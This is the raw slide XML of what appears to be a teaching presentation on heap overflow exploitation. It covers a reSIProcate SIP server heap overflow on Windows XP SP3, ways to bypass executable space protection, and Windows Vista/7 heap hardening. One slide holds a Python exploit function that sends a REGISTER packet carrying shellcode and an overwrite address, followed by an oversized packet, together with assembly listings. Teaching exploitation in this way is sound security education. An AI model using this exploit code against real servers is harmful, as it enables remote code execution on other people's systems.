              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> [0x71a87210]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x71A53F94:    call    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> + 0x20]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28985720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424141" y="1909315"/>
            <a:ext cx="11217896" cy="742825"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Arbitrary code execution on Windows XP SP3 (bypassing safe-unlinking check using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>FreeLists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>[0] technique)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1619250" y="419100"/>
            <a:ext cx="10267950" cy="560164"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reSIProcate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> heap overflow vulnerability: XP SP3 exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1026704" y="2854892"/>
            <a:ext cx="10012771" cy="2677656"/>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35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200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exploit_server_heap_overflow_windows_xp_sp3</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connection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>global</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> username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server</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via </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buffer_length</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0x20</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> shellcode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23</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b"\x90"</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b"\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xBE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xBA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xFE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xCA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808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234</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b"\x90“ </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register_packet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808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>b"REGISTER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="80808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shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>b"sip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="80808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server</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encode</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b" SIP/2.0\x0d\x0aVia: SIP/2.0/TCP "</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via</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encode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b"\x0d\x0aContact: &lt;sip:"</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username</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encode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b"@"</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via</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encode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b"&gt;\x0d\x0aTo: &lt;sip:"</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username</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encode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b"@"</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server</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encode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808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>b";transport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=TCP&gt;\x0d\x0aFrom: &lt;sip:"</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username</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encode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b"@"</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server</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encode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b"&gt;\x0d\x0aCSeq: 1 REGISTER\x0d\x0aExpires: 600\x0d\x0aContent-Length: "</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808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buffer_length</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encode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b"\x0d\x0a\x0d\x0a"</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write_address</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b"\x10\x72\xA8\x71“</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="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oversized_packet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buffer_length</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220</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808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>b"X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808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write_address</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1024</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808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>b"X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808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connection</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send</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register_packet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connection</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send</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oversized_packet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3524187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843212" y="1329827"/>
            <a:ext cx="6181725" cy="4410075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100" cap="sq">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="63500">
              <a:schemeClr val="accent4">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1581150" y="453143"/>
            <a:ext cx="9744075" cy="504825"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bypassing executable space protection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42327869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86591417-BF88-407B-A77B-4571B6E635A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="887102" y="1962150"/>
            <a:ext cx="10590523" cy="4057650"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200" algn="l" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="Θ"/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Lookaside lists replaced by Low Fragmentation Heap (LFH)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200" algn="l" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="Θ"/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Heap entry metadata randomization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200" algn="l" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="Θ"/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Heap cookie checking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200" algn="l" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="Θ"/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Randomized heap base address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200" algn="l" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="Θ"/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Function pointer encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200" algn="l" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="Θ"/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Termination on heap corruption (if enabled)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200" algn="l" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="Θ"/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Algorithm variation depending on allocation patterns</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://blogs.technet.microsoft.com/srd/2009/08/04/preventing-the-exploitation-of-user-mode-heap-corruption-vulnerabilities/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="514350"/>
            <a:ext cx="11245850" cy="868363"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Heap overflow vulnerabilities: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                     Windows Vista/Server 2008/7 heap hardening</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35178124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07;p24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{163192B7-8DAA-4D79-8706-9E055E246219}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2524492"/>
            <a:ext cx="8310332" cy="1015800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="6000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Medium"/>
                <a:ea typeface="Montserrat Medium"/>
                <a:cs typeface="Montserrat Medium"/>
                <a:sym typeface="Montserrat Medium"/>
              </a:rPr>
              <a:t>    HEAP OVERFLOW</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="6000"/>
